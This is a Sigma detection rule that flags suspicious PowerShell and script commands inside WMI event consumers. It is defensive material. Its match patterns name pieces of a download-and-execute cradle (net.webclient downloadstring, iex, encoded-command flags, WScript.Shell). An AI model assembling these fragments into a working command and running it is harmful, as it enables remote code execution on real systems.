Techniques
Sample rules
Suspicious Scripting in a WMI Consumer
- source: sigma
- technicques:
- t1059
- t1059.005
Description
Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers
Detection logic
condition: selection_destination
selection_destination:
- Destination|contains|all:
- new-object
- net.webclient
- .downloadstring
- Destination|contains|all:
- new-object
- net.webclient
- .downloadfile
- Destination|contains:
- ' iex('
- ' -nop '
- ' -noprofile '
- ' -decode '
- ' -enc '
- WScript.Shell
- System.Security.Cryptography.FromBase64Transform